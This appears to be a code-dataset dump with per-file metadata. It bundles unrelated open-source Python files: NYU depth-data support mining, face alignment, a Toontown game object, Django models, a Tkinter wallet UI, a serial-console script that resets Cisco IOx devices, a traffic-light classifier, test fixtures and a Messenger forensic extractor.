max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/Parse/NYUSupport.py | Stonehill-GWAIN-PC-Lab/Data-Mining-for-Procedural-Room-Generation | 2 | 12772851 | <reponame>Stonehill-GWAIN-PC-Lab/Data-Mining-for-Procedural-Room-Generation
#It's a matlab file that needs to be cleaned up
from scipy.io import loadmat
import h5py,math
from collections import Counter,defaultdict
import numpy as np
from .. import ObjectMetrics
#Return back a parsed list of Support frequency connections from the nyu_depth_v2_labeled matlab matrix.
#That matrix was converted from the original found at https://cs.nyu.edu/~silberman/datasets/
def readMat(matPath): #10 percent in the paper
    """Parse per-scene support triples out of the NYU Depth v2 labelled data.

    Reads ``nyu_depth_v2_labeled.mat`` (HDF5), ``scenes.dat``, ``names.dat``
    and ``support_labels.mat`` from *matPath* and returns a dict mapping a
    scene type (e.g. ``"bedroom"``) to a list of scenes, each scene being a
    list of ``[supported, supporter, support-type]`` triples with numeric
    labels replaced by object names.
    """
    f = h5py.File(matPath+"nyu_depth_v2_labeled.mat",'r')
    rooms = f['labels']
    def conv1(x):
        # Remap per-image label indices to global label ids via first_change.
        # NOTE(review): first_change is a closure over a variable rebound per
        # image in the loop below — conv1 must only be called inside that loop.
        maximum = len(first_change)
        if x[0] > 0 and x[0] < maximum:
            x[0] = first_change[x[0]]
        if x[1] > 0 and x[1] < maximum:
            x[1] = first_change[x[1]]
        return x
    def convert(x):
        # Decode the numeric support-type code and replace label ids with
        # object names; ids missing from names_to_id become 'room'.
        if x[2] == 1:
            x[2] = 'Vertical-Support'
        elif x[2] == 2:
            x[2] = 'Horizontal-Support'
        else:
            x[2] = 'Support'
        if x[0] in names_to_id:
            x[0] = names_to_id[x[0]]
        else:
            x[0] = 'room'
        if x[1] in names_to_id:
            x[1] = names_to_id[x[1]]
        else:
            x[1] = 'room'
        return x
    # scenes.dat: "<image index>$<scene type>" per line.
    places = open(matPath + 'scenes.dat','r').readlines()
    places = [i.strip().split('$') for i in places]
    ps = {}
    ret_data = defaultdict(list)
    for x in places:
        ps[int(x[0])] = x[1]
    # names.dat: "<object name>$<label id>" per line.
    exitnames = open(matPath + 'names.dat','r').readlines()
    exitnames = [i.strip().split('$') for i in exitnames]
    names_to_id = {}
    for i in exitnames:
        names_to_id[int(i[1])] = i[0]
    support = loadmat(matPath + 'support_labels.mat')['supportLabels']
    #This loads the actual support code
    for i in range(len(support)):
        first_change = np.unique(rooms[i,:,:])
        x = support[i][0].tolist()
        place = ps[i]
        x = list(map(lambda j:conv1(j),x)) #First, convert to correct names per scene
        x = list(map(lambda j:convert(j),x))
        #if place == "bedroom":
        #    print (x)
        if place in ret_data:
            ret_data[place].append(x)
        else:
            ret_data[place] = [x]
    return ret_data
def cleanRules(scenes):
    """Return a cleaner rule-set with some known noise pre-removed.

    Drops any triple containing 'None' (logged to stdout) and any
    'Vertical-Support' triple that involves a wall but neither the floor
    nor the room. This can be expanded into a better human-in-the-loop
    system.
    """
    cleaned = {}
    for place in sorted(scenes.keys()):
        kept_scenes = []
        for scene in scenes[place]:
            kept = []
            for rule in scene:
                if 'None' in rule:
                    print("did not add", rule)
                    continue
                # Wall-only vertical supports are considered noise.
                is_wall_noise = (rule[2] == 'Vertical-Support'
                                 and 'wall' in rule
                                 and 'floor' not in rule
                                 and 'room' not in rule)
                if not is_wall_noise:
                    kept.append(rule)
            kept_scenes.append(kept)
        cleaned[place] = kept_scenes
    return cleaned
def getSupportTypes(scenes):
    """Return the distinct support-type labels across *scenes*, in first-seen order."""
    # dict.fromkeys deduplicates while preserving insertion order.
    ordered = dict.fromkeys(triple[2] for scene in scenes for triple in scene)
    return list(ordered)
def supportFrequency(scenes, threshold=0.1, debug=False):
    """Count, per object, how many scenes it participates in.

    An object counts at most once per scene (whether it appears as the
    supported or the supporting item); triples containing 'None' are
    ignored. Returns rows ["frequency", object, count-as-string] for every
    object whose scene count exceeds len(scenes) * threshold.
    """
    frequency = Counter()
    cutoff = len(scenes) * threshold
    for scene in scenes:
        # Ordered de-duplication of the objects seen in this scene.
        seen = {}
        for triple in scene:
            if 'None' not in triple:
                seen[triple[0]] = True
                seen[triple[1]] = True
        for obj in seen:
            frequency[obj] += 1
    if debug:
        for scene in scenes:
            for triple in scene:
                print(triple)
        print (frequency)
    return [["frequency", str(obj), str(n)]
            for obj, n in frequency.items() if n > cutoff]
def supportMining(scenes, good_objects, threshold=0.1):
    """Perform frequent pattern mining on the directed support edges.

    Counts (supporter, supported) pairs — reversed from the input edge
    order — restricted to objects in *good_objects*, and keeps pairs seen
    in at least ceil(len(scenes) * threshold) scenes. If a single object
    does not reach the minimum threshold it cannot appear in any larger
    support pattern.
    """
    min_support = math.ceil(len(scenes) * threshold)
    pair_counts = Counter()
    for scene in scenes:
        for edge in scene:
            if edge[0] in good_objects and edge[1] in good_objects:
                pair_counts[(edge[1], edge[0])] += 1
    return [(supporter, supported, str(n))
            for (supporter, supported), n in pair_counts.items()
            if n >= min_support]
# NOTE(review): exact duplicate of the getSupportTypes defined earlier in this
# module; this later definition shadows the first. Consider removing one copy.
def getSupportTypes(scenes):
    #Quick helper function to get the types we have for a given scene
    types = []
    for scene in scenes:
        for j in scene:
            if j[2] not in types:
                types.append(j[2])
    return types
def buildSupportValues(scene, support):
    """Filter each scene down to [supported, supporter] edges of one support type.

    Scenes that end up with no matching edges are omitted entirely.
    """
    filtered = []
    for one_scene in scene:
        edges = [[triple[0], triple[1]]
                 for triple in one_scene if triple[2] == support]
        if edges:
            filtered.append(edges)
    return filtered
def mineNYU2Data(path_to_data,output_path):
    '''Run the full NYU v2 support-mining pipeline and write CSV rows to *output_path*.

    For every scene type it writes a header line (place, scene count), then
    the per-object frequency rows, then the mined support pairs for each
    support type found in that place.
    '''
    mat_path = path_to_data+"data/sunrgbd/nyu_2_mat/"
    debug = False
    support = readMat(mat_path)
    support = cleanRules(support)#Cleans up some of our known noisy data that we shouldn't have
    with open(output_path,'w') as fi:
        for place in sorted(support.keys()):
            print (place)
            fi.write(','.join([place,str(len(support[place]))])+'\n')
            support_types = getSupportTypes(support[place])
            #print (support[place])
            rf = supportFrequency(support[place],0.1)
            for i in rf: #This is each item that was high enough support
                fi.write(','.join([ObjectMetrics.cleanup_word(str(j)) for j in i])+'\n')
            #In rc, we split up into our different factors. That will allow us to search each graph independently
            for s in support_types:
                # rf rows are ["frequency", object, count]; i[1] is the object name.
                prox = supportMining(buildSupportValues(support[place],s),[i[1] for i in rf],0.1)
                for item in prox:
                    fi.write(','.join([ObjectMetrics.cleanup_word(s)]+[ObjectMetrics.cleanup_word(i) for i in item])+'\n')
                del prox
| 2.34375 | 2 |
src/111.py | cloudzfy/euler | 12 | 12772852 | <filename>src/111.py
# Considering 4-digit primes containing repeated digits it is
# clear that they cannot all be the same: 1111 is divisible by
# 11, 2222 is divisible by 22, and so on. But there are nine
# 4-digit primes containing three ones:
# 1117, 1151, 1171, 1181, 1511, 1811, 2111, 4111, 8111
# We shall say that M(n, d) represents the maximum number of
# repeated digits for an n-digit prime where d is the repeated
# digit, N(n, d) represents the number of such primes, and
# S(n, d) represents the sum of these primes.
# So M(4, 1) = 3 is the maximum number of repeated digits for
# a 4-digit prime where one is the repeated digit, there are
# N(4, 1) = 9 such primes, and the sum of these primes is
# S(4, 1) = 22275. It turns out that for d = 0, it is only
# possible to have M(4, 0) = 2 repeated digits, but there are
# N(4, 0) = 13 such cases.
# In the same way we obtain the following results for 4-digit
# primes.
# Digit, d M(4, d) N(4, d) S(4, d)
# 0 2 13 67061
# 1 3 9 22275
# 2 3 1 2221
# 3 3 12 46214
# 4 3 2 8888
# 5 3 1 5557
# 6 3 1 6661
# 7 3 9 57863
# 8 3 1 8887
# 9 3 7 48073
# For d = 0 to 9, the sum of all S(4, d) is 273700.
# Find the sum of all S(10, d).
| 3.796875 | 4 |
demo/align_face.py | hologerry/pix2pix-flow | 2,898 | 12772853 | # OLD USAGE
# python align_faces.py --shape-predictor shape_predictor_68_face_landmarks.dat --image images/example_01.jpg
# import the necessary packages
from imutils.face_utils import FaceAligner
from PIL import Image
import numpy as np
# import argparse
import imutils
import dlib
import cv2
# construct the argument parser and parse the arguments
# ap = argparse.ArgumentParser()
# ap.add_argument("--shape-predictor", help="path to facial landmark predictor", default='shape_predictor_68_face_landmarks.dat')
# ap.add_argument("--input", help="path to input images", default='input_raw')
# ap.add_argument("--output", help="path to input images", default='input_aligned')
# args = vars(ap.parse_args())
# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor and the face aligner
# Module-level, loaded once: dlib's HOG-based frontal face detector, the
# 68-point landmark predictor (model file expected in the working directory),
# and the imutils FaceAligner that outputs 256x256 aligned crops.
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')
fa = FaceAligner(predictor, desiredFaceWidth=256,
                 desiredLeftEye=(0.371, 0.480))
# Input: numpy array for image with RGB channels
# Output: (numpy array, face_found)
def align_face(img):
    """Detect the first face in an RGB image and return it aligned.

    Returns (aligned_rgb_array, True) on success, or (None, False) when no
    face is detected.
    """
    img = img[:, :, ::-1]  # Convert from RGB to BGR format (OpenCV channel order)
    img = imutils.resize(img, width=800)
    # detect faces in the grayscale image
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    rects = detector(gray, 2)
    if len(rects) > 0:
        # align the first detected face using facial landmarks, then flip
        # the channel order back to RGB
        align_img = fa.align(img, gray, rects[0])[:, :, ::-1]
        align_img = np.array(Image.fromarray(align_img).convert('RGB'))
        return align_img, True
    else:
        # No face found
        return None, False
# Input: img_path
# Output: aligned_img if face_found, else None
def align(img_path):
    """Load the image at *img_path* and return the aligned face, or None if no face found."""
    img = Image.open(img_path)
    img = img.convert('RGB')  # if image is RGBA or Grayscale etc
    img = np.array(img)
    x, face_found = align_face(img)
    return x
toontown/fishing/DistributedFishingTarget.py | AnonymousDeveloper65535/open-toontown | 8 | 12772854 | <gh_stars>1-10
from pandac.PandaModules import *
from direct.distributed.ClockDelta import *
from direct.interval.IntervalGlobal import *
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedNode
from direct.fsm import ClassicFSM
from direct.fsm import State
from direct.directutil import Mopath
from toontown.toonbase import ToontownGlobals
from direct.actor import Actor
import FishingTargetGlobals
import random
import math
from toontown.effects import Bubbles
class DistributedFishingTarget(DistributedNode.DistributedNode):
    """Client-side distributed fishing target that drifts around a pond.

    NOTE(review): Python 2 style module (implicit relative imports above).
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedFishingTarget')
    # Class-wide catch radius returned by getRadius().
    radius = 2.5

    def __init__(self, cr):
        DistributedNode.DistributedNode.__init__(self, cr)
        NodePath.__init__(self)
        self.pond = None
        self.centerPoint = (0, 0, 0)
        self.maxRadius = 1.0
        self.track = None
        return

    def generate(self):
        # Attach our scene-graph node, then add a drop shadow and bubbles.
        self.assign(render.attachNewNode('DistributedFishingTarget'))
        shadow = loader.loadModel('phase_3/models/props/drop_shadow')
        shadow.setPos(0, 0, -0.1)
        shadow.setScale(0.33)
        shadow.setColorScale(1, 1, 1, 0.75)
        shadow.reparentTo(self)
        self.bubbles = Bubbles.Bubbles(self, render)
        self.bubbles.renderParent.setDepthWrite(0)
        self.bubbles.start()
        DistributedNode.DistributedNode.generate(self)

    def disable(self):
        # Stop any in-flight movement interval and tear down effects.
        if self.track:
            self.track.finish()
            self.track = None
        self.bubbles.destroy()
        del self.bubbles
        self.pond.removeTarget(self)
        self.pond = None
        DistributedNode.DistributedNode.disable(self)
        return

    def delete(self):
        del self.pond
        DistributedNode.DistributedNode.delete(self)

    def setPondDoId(self, pondDoId):
        # Distributed field: bind this target to its pond by distributed-object id.
        self.pond = base.cr.doId2do[pondDoId]
        self.pond.addTarget(self)
        self.centerPoint = FishingTargetGlobals.getTargetCenter(self.pond.getArea())
        self.maxRadius = FishingTargetGlobals.getTargetRadius(self.pond.getArea())

    def getDestPos(self, angle, radius):
        # Polar coordinates (angle in radians) -> cartesian around the pond center.
        x = radius * math.cos(angle) + self.centerPoint[0]
        y = radius * math.sin(angle) + self.centerPoint[1]
        z = self.centerPoint[2]
        return (x, y, z)

    def setState(self, stateIndex, angle, radius, time, timeStamp):
        # Distributed field: lerp to the new position over the time remaining
        # after accounting for network latency.
        ts = globalClockDelta.localElapsedTime(timeStamp)
        pos = self.getDestPos(angle, radius)
        if self.track and self.track.isPlaying():
            self.track.finish()
        self.track = Sequence(LerpPosInterval(self, time - ts, Point3(*pos), blendType='easeInOut'))
        self.track.start()

    def getRadius(self):
        return self.radius
| 1.898438 | 2 |
social_media_crawling/models.py | diahnuri/TMSS | 1 | 12772855 | <filename>social_media_crawling/models.py<gh_stars>1-10
from django.db import models
# Create your models here.
class Crawl(models.Model):
    """Generic crawled social-media post (140-char content)."""
    name = models.CharField(max_length=100)
    content = models.CharField(max_length=140)
    c_at = models.DateField()
    #Retweet = models.CharField(max_length=100)
    #hashtag = models.CharField(max_length=100)

    def __str__(self):
        # Fixed: was misspelled `_str_` (never invoked by Django) and
        # returned a tuple, which is not a valid __str__ result.
        return self.content
class TwitterCrawl(models.Model):
    """Raw crawled tweet with optional retweet source and hashtag."""
    name = models.CharField(max_length=100)
    tweet = models.CharField(max_length=140)
    date = models.DateField()
    Retweet_user = models.CharField(max_length=100, null=True)
    hashtag = models.CharField(max_length=100, null=True)

    def __str__(self):
        # Fixed: was misspelled `_str_` and returned a tuple.
        return self.tweet
class TwitterTopik(models.Model):
    """Topic label used to group tweets in the dataset."""
    topik = models.CharField(max_length=150)

    def __str__(self):
        # Fixed: was misspelled `_str_`.
        return self.topik
class TwitterDataset(models.Model):
    """Curated tweet assigned to a TwitterTopik."""
    name = models.CharField(max_length=100)
    tweet = models.CharField(max_length=140)
    date = models.DateField()
    Retweet_user = models.CharField(max_length=100, null=True)
    hashtag = models.CharField(max_length=100, null=True)
    topik = models.ForeignKey(TwitterTopik, on_delete=models.CASCADE)

    def __str__(self):
        # Fixed: was misspelled `_str_` and returned a tuple.
        return self.tweet
class FacebookCrawl(models.Model):
    """Raw crawled Facebook status with engagement counts."""
    name = models.CharField(max_length=100)
    status = models.CharField(max_length=5000)
    like = models.IntegerField(blank=True)
    comment = models.IntegerField(blank=True)
    share = models.IntegerField(blank=True)

    def __str__(self):
        # Fixed: was misspelled `_str_` and returned a tuple.
        return self.status
class FacebookTopik(models.Model):
    """Topic label used to group Facebook statuses in the dataset."""
    topik = models.CharField(max_length=150)
    # user =

    def __str__(self):
        # Added for parity with the other topic model.
        return self.topik
class FacebookDataset(models.Model):
    """Curated Facebook status assigned to a FacebookTopik."""
    name = models.CharField(max_length=100)
    status = models.CharField(max_length=5000)
    like = models.IntegerField(blank=True)
    comment = models.IntegerField(blank=True)
    share = models.IntegerField(blank=True)
    topik = models.ForeignKey(FacebookTopik, on_delete=models.CASCADE)

    def __str__(self):
        # Fixed: was misspelled `_str_` and returned a tuple.
        return self.status
| 2.359375 | 2 |
scripts/extract_src.py | jvyduna/pb-examples | 3 | 12772856 | <gh_stars>1-10
# Use this to extract the src/ directory from the contents of epe/.
# Aborts if it finds a file to overwrite; IE, to use this, explicitly delete the
# contents of src/ first, in order to not lose any changes made in the src/
# directory and not yet reflected in the corresponding .epe
import io, os, fnmatch, json, re
# Assumes the script lives in a subdirectory peer of epe/ and src/
script_dir = os.path.dirname(__file__)
indir = os.path.join(script_dir, "..", "epe")
outdir = os.path.join(script_dir, "..", "src")
for epe_filename in fnmatch.filter(os.listdir(indir), "*.epe"):
    print("Extracting source from " + epe_filename)
    # .epe files are JSON, possibly written with a UTF-8 BOM.
    with io.open(os.path.join(indir, epe_filename), 'r', 4096, 'utf-8-sig') as epe:
        program = json.load(epe)
    # Escape the dot so the regex strips only a literal ".epe" suffix.
    src_filename = re.sub(r"\.epe$", "", epe_filename) + ".js"
    # Mode 'x' raises FileExistsError instead of overwriting existing sources.
    with io.open(os.path.join(outdir, src_filename), 'x') as sourcecode:
        sourcecode.write(program['sources']['main'])
src/selfcoin/node/ui/ui.py | wangyubin112/selfcoin | 0 | 12772857 | from tkinter import *
from tkinter.font import Font
from tkinter.ttk import *
from tkinter.messagebox import *
#import tkinter.filedialog as tkFileDialog
#import tkinter.simpledialog as tkSimpleDialog #askstring()
from node.ui.access import access
from node.ui.trade import trade
from node.ui.post import post
from node.ui.charge import charge
from node.ui.watch import watch
from node.ui.show import show
class Ui(Frame):
    """Top-level Tkinter frame for the Self-coin node.

    Lays out two side-by-side Notebook widgets: an info panel (left,
    populated by show()) and an operations panel (right) whose tabs are
    populated by the imported access/post/charge/trade/watch helpers.
    """

    def __init__(self, master=None):
        Frame.__init__(self, master)
        self.master.title('Self-coin')
        self.master.geometry('1200x1000')
        self.createWidgets()

    def createWidgets(self):
        # Build both notebooks; each helper receives `self` and fills in
        # the corresponding tab's widgets.
        self.top = self.winfo_toplevel()
        # self.style = Style()
        ## info
        self.info_notebook = Notebook(self.top)
        self.info_notebook.place(relx=0.0, rely=0.0, relwidth=0.5, relheight=1.0)
        # self.info_notebook.grid(row = 0, column = 0, sticky=N+S+E+W)
        show(self)
        ## operate
        self.operate_notebook = Notebook(self.top)
        self.operate_notebook.place(relx=0.5, rely=0.0, relwidth=0.5, relheight=1.0)
        # self.operate_notebook.grid(row = 0, column = 1, sticky=N+S+E+W)
        # tab 0 (access)
        self.tab_access = Frame(self.operate_notebook)
        access(self)
        self.operate_notebook.add(self.tab_access, text='Access')
        # tab 1 (post)
        self.tab_post = Frame(self.operate_notebook)
        post(self)
        self.operate_notebook.add(self.tab_post, text='Post')
        # tab 2 (charge)
        self.tab_charge = Frame(self.operate_notebook)
        charge(self)
        self.operate_notebook.add(self.tab_charge, text='Charge')
        # tab 3 (trade)
        self.tab_trade = Frame(self.operate_notebook)
        trade(self)
        self.operate_notebook.add(self.tab_trade, text='Trade')
        # tab 4 (watch)
        self.tab_watch = Frame(self.operate_notebook)
        watch(self)
        self.operate_notebook.add(self.tab_watch, text='Watch')
pyserial_util/clear_reload.py | DevOps4Networks/iox-utils | 0 | 12772858 | #! /usr/bin/env python
# encoding: utf-8
"""
This script is intended to be used to automate the process of
clearing configurations and reloading, via a console connection,
for devices that support Cisco's IOx platform.
The outcome is a device that has no startup configuration, and which has
been booted from rommon-2 for a given image. This is the software equivalent
of using the reset button.
It assumes that there are one or more devices connected, typically via a mini-USB
cable, to the machine upon which this script is running. For example, a MacBookPro
with three such devices connected with a USB hub.
The script uses pyserial to connect to the serial ports and carry out a set of
interactions. The style is very reminiscent of "expect". That also means, though,
that things don't always work as expected because the CLI wasn't really meant for
automation like this, hence the copious logging.
Note that these drivers will likely be required for pyserial:
https://www.silabs.com/products/mcu/Pages/USBtoUARTBridgeVCPDrivers.aspx#mac
Copyright 2016 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import serial
import time
import sys
import logging
from logging.config import fileConfig
import os
from pyserial_util.cli_utils import *
usb_port_base = "cu.SLAB_USBtoUART"
enable_password = "<PASSWORD>"
def main(argv=None):
    """Clear startup-config and reload every attached IOx device over its
    console port, then boot each one from the rommon-2 prompt with the
    configured flash image. Returns 0.
    """
    boot_image = "ir800-universalk9_npe-mz.SPA.156-2.T"
    device_serial_ports = get_console_ports(usb_port_base)
    logger.info("About to start on these serial ports and devices:\n")
    for dev_ser_port in device_serial_ports:
        logger.info("Port = " + str(dev_ser_port.serial_port) + " device type = " +
                    str(dev_ser_port.device_type) + "\n")
    summary = []
    # Phase 1: clear the startup configuration and trigger a reload.
    for dev_ser_port in device_serial_ports:
        logger.info("Working with a " + dev_ser_port.device_type + " at " + dev_ser_port.serial_port.port
                    + " to clear startup configuration and reload.")
        if enable(dev_ser_port.serial_port, enable_password) == 0:
            dev_ser_port.serial_port.write("clear start\r")
            time.sleep(1)
            response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
            logger.debug(response)
            if "[confirm]" in response:
                dev_ser_port.serial_port.write("\r")
                time.sleep(1)
                dev_ser_port.serial_port.write("\r")
                response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
                logger.debug(response)
            if response.endswith("#"):
                dev_ser_port.serial_port.write("reload\r")
                time.sleep(1)
                response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
                logger.debug(response)
                # Walk the interactive reload dialog, answering each prompt
                # as it appears; `response` is re-read after every answer.
                if "Do you want to reload the internal AP ? [yes/no]:" in response:
                    dev_ser_port.serial_port.write("yes\r")
                    time.sleep(1)
                    response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
                    logger.debug(response)
                if "Do you want to save the configuration of the AP? [yes/no]" in response:
                    dev_ser_port.serial_port.write("no\r")
                    time.sleep(1)
                    response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
                    logger.debug(response)
                if "System configuration has been modified. Save? [yes/no]" in response:
                    dev_ser_port.serial_port.write("no\r")
                    time.sleep(1)
                    response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
                    logger.debug(response)
                if "Proceed with reload? [confirm]" in response:
                    dev_ser_port.serial_port.write("\r")
                    time.sleep(1)
                    response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
                    logger.debug(response)
                summary.append("Cleared and reloaded a " + dev_ser_port.device_type + " at "
                               + dev_ser_port.serial_port.port + ".\n")
    # Give the devices time to start rebooting before polling for rommon.
    time.sleep(60)
    # Phase 2: poll until the rommon-2 prompt appears, then boot the image.
    for dev_ser_port in device_serial_ports:
        logger.info("Working with a " + dev_ser_port.device_type + " at " + dev_ser_port.serial_port.port
                    + " to boot from rommon-2.")
        while True:
            dev_ser_port.serial_port.write("\r")
            time.sleep(1)
            response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
            logger.debug(response)
            if "rommon-2>" in response:
                dev_ser_port.serial_port.write("boot flash:/" + boot_image + "\r")
                time.sleep(1)
                response = strip_cr_nl(dev_ser_port.serial_port.read(dev_ser_port.serial_port.inWaiting()))
                logger.debug(response)
                break
        summary.append("Booted from rommon-2 a " + dev_ser_port.device_type + " at "
                       + dev_ser_port.serial_port.port + ".\n")
    logger.info("The summary is:\n")
    for result in summary:
        logger.info(str(result) + "\n")
    return 0
if __name__ == "__main__":
sys.exit(main())
| 2.46875 | 2 |
ros/src/tl_detector/light_classification/tl_classifier.py | adityasiwan/system-integration | 1 | 12772859 | from styx_msgs.msg import TrafficLight
import cv2
import numpy as np
class TLClassifier(object):
    """HSV colour-threshold based traffic light classifier."""

    def __init__(self):
        pass

    def get_classification(self, image):
        """Determines the color of the traffic light in the image

        Args:
            image (cv::Mat): image containing the traffic light, BGR order

        Returns:
            int: ID of traffic light color (specified in styx_msgs/TrafficLight)
        """
        img_blur = cv2.medianBlur(image, 3)
        img_hsv = cv2.cvtColor(img_blur, cv2.COLOR_BGR2HSV)
        # Fixed: the masks below referenced an undefined name `hsv_image`
        # (NameError at runtime); the converted image is `img_hsv`.
        # Red hue wraps around 0/180 in OpenCV's HSV space, so threshold
        # both ends of the hue range.
        red_lower_range = cv2.inRange(img_hsv, np.array([0, 100, 100], np.uint8), np.array([10, 255, 255], np.uint8))
        red_upper_range = cv2.inRange(img_hsv, np.array([160, 100, 100], np.uint8), np.array([179, 255, 255], np.uint8))
        yellow_range = cv2.inRange(img_hsv, np.array([28, 120, 120], np.uint8), np.array([47, 255, 255], np.uint8))
        # Treat both red and yellow as "stop"; 48 pixels is the detection floor.
        if cv2.countNonZero(red_lower_range) + cv2.countNonZero(red_upper_range) > 48 or cv2.countNonZero(yellow_range) > 48:
            return TrafficLight.RED
        else:
            return TrafficLight.GREEN
        # return TrafficLight.UNKNOWN
| 3.265625 | 3 |
tests/fixtures/messages.py | ExpressApp/pybotx | 13 | 12772860 | import pytest
from botx import (
ChatCreatedEvent,
InternalBotNotificationEvent,
InternalBotNotificationPayload,
Message,
MessageBuilder,
UserKinds,
)
from botx.models.events import UserInChatCreated
@pytest.fixture()
def incoming_message(host, bot_id):
    """Raw incoming message built for the test bot id and host."""
    builder = MessageBuilder()
    builder.bot_id = bot_id
    builder.user.host = host
    return builder.message
@pytest.fixture()
def message(incoming_message, bot):
    """Domain Message wrapping the raw incoming message fixture."""
    return Message.from_dict(incoming_message.dict(), bot)
@pytest.fixture()
def chat_created_message(host, bot_id):
    """Incoming ``system:chat_created`` event with the user (admin) and the bot as members."""
    builder = MessageBuilder()
    builder.bot_id = bot_id
    builder.command_data = ChatCreatedEvent(
        group_chat_id=builder.user.group_chat_id,
        chat_type=builder.user.chat_type,
        name="chat",
        creator=builder.user.user_huid,
        members=[
            UserInChatCreated(
                huid=builder.user.user_huid,
                user_kind=UserKinds.user,
                name=builder.user.username,
                admin=True,
            ),
            UserInChatCreated(
                huid=builder.bot_id,
                user_kind=UserKinds.bot,
                name="bot",
                admin=False,
            ),
        ],
    )
    # System events carry no sender identity, so blank out the user fields.
    builder.user.user_huid = None
    builder.user.ad_login = None
    builder.user.ad_domain = None
    builder.user.username = None
    builder.body = "system:chat_created"
    builder.system_command = True
    return builder.message
@pytest.fixture()
def internal_bot_notification_message(host, bot_id, bot):
    """Incoming ``system:internal_bot_notification`` event wrapped as a domain Message."""
    builder = MessageBuilder()
    builder.bot_id = bot_id
    builder.command_data = InternalBotNotificationEvent(
        data=InternalBotNotificationPayload(message="ping"),  # noqa: WPS110
        opts={},
    )
    builder.body = "system:internal_bot_notification"
    builder.system_command = True
    return Message.from_dict(builder.message.dict(), bot)
| 2.046875 | 2 |
plugins/fb-messenger-1-0-0/main.py | pr4xx/db-forensic-framework | 1 | 12772861 | <reponame>pr4xx/db-forensic-framework<gh_stars>1-10
import click
from datetime import datetime
from pony.orm import *
from framework.Core import Core
from framework.analysis.chat.Chat import Chat
from framework.analysis.chat.Conversation import Conversation
from framework.analysis.chat.Message import Message as FrameworkMessage
from framework.analysis.chat.Participant import Participant
# Entity definitions
class F_User(Core.instance.db.Entity):
    """Pony ORM entity over the Messenger ``thread_users`` table."""
    _table_ = "thread_users"
    user_key = PrimaryKey(str)
    name = Required(str)
class F_Thread(Core.instance.db.Entity):
    """Pony ORM entity over the Messenger ``threads`` table; owns its messages."""
    _table_ = "threads"
    thread_key = PrimaryKey(str)
    messages = Set("F_Message", reverse="thread")
class F_Message(Core.instance.db.Entity):
    """Pony ORM entity over the Messenger ``messages`` table."""
    _table_ = "messages"
    msg_id = PrimaryKey(str)
    thread = Required("F_Thread", reverse="messages", column="thread_key")
    # sender is stored as JSON; expected to contain a 'user_key' field
    # (see extract() below) — TODO confirm against the source schema.
    sender = Optional(Json)
    text = Optional(str)
    timestamp_ms = Required(int)
# Command definitions
@click.group()
@click.pass_context
def cli(ctx):
    """ This plugin extracts chats and participants. """
    # Entity-to-table mapping must be generated once before any db_session use.
    Core.instance.db.generate_mapping()
@cli.command()
@click.pass_context
@db_session
def extract(ctx):
    """ Generates multiple chats. """
    chat = Chat("Facebook Messenger")
    # Fetch all users and key by id
    users = {}
    db_users = select(u for u in F_User)[:]
    for user in db_users:
        users[user.user_key] = {
            "db_user": user,
            "chat_user": Participant(user.name)
        }
    # Fetch all threads; each thread becomes one Conversation.
    threads = select(t for t in F_Thread)[:]
    for thread in threads:
        conversation = Conversation()
        # Fetch all messages of this thread, oldest first
        messages = thread.messages.order_by(F_Message.timestamp_ms)
        for message in messages:
            if not message.sender:
                # Skip rows with no sender payload (e.g. system messages).
                continue
            user_key = message.sender['user_key']
            # timestamp_ms is epoch milliseconds.
            time = datetime.fromtimestamp(message.timestamp_ms / 1000)
            conversation.add(FrameworkMessage(users[user_key]['chat_user'], time, message.text))
        chat.add(conversation)
    Core.instance.render(chat)
| 1.945313 | 2 |
quiz/admin.py | Afnarel/django-quiz | 5 | 12772862 | <filename>quiz/admin.py
from django.contrib import admin
from quiz.models import Quiz, Category, Question, Answer
from forms import QuizAdminForm
class QuestionInline(admin.TabularInline):
    """Inline editor for the Question<->Quiz M2M through rows."""
    model = Question.quiz.through
    filter_horizontal = ('content',)
class AnswerInline(admin.TabularInline):
    """Inline editor for a question's answers."""
    model = Answer
class QuizAdmin(admin.ModelAdmin):
    """Admin for Quiz; uses a custom form for quiz/question association."""
    form = QuizAdminForm
    list_display = ('title', 'category',)
    list_filter = ('category',)
    search_fields = ('description', 'category',)
class CategoryAdmin(admin.ModelAdmin):
    """Admin for Category, searchable by name."""
    search_fields = ('name',)
class QuestionAdmin(admin.ModelAdmin):
    """Admin for Question with inline answers and M2M quiz picker."""
    list_display = ('content', 'category',)
    list_filter = ('category',)
    fields = ('content', 'category', 'quiz', 'explanation',)
    search_fields = ('content',)
    filter_horizontal = ('quiz',)
    inlines = [AnswerInline]
# Wire the model admins into the default admin site.
admin.site.register(Quiz, QuizAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(Question, QuestionAdmin)
| 2.1875 | 2 |
tests/test_utils/test_bot_info.py | vitaliy-ukiru/math-bot | 1 | 12772863 | <reponame>vitaliy-ukiru/math-bot
import unittest
from datetime import timedelta
from time import monotonic as time
import sys
